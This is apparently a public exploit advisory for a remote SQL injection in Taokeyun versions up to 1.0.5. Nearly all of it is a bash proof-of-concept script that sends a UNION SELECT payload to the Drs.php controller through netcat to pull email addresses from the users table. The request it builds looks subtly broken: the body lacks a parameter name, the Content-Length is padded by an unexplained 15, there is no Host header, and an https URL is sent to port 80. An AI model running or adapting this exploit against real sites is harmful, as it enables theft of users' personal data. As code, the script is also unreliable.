Taokeyun versions up to 1.0.5 suffers from a remote SQL injection vulnerability.
1f422c49bad5c6f9ab4afd9b61892e4f89f1c8e3f531ea9bd64603a009bccfa3
#!/bin/bash
# Variables
url="https://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"
cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"
# Construct the request
request="POST $url HTTP/1.1\r\n"
request+="Content-Type: application/x-www-form-urlencoded\r\n"
request+="Content-Length: $((${#cid}+15))\r\n\r\n"
request+="$cid"
# Send the request
(echo -e "$request") | nc example.com 80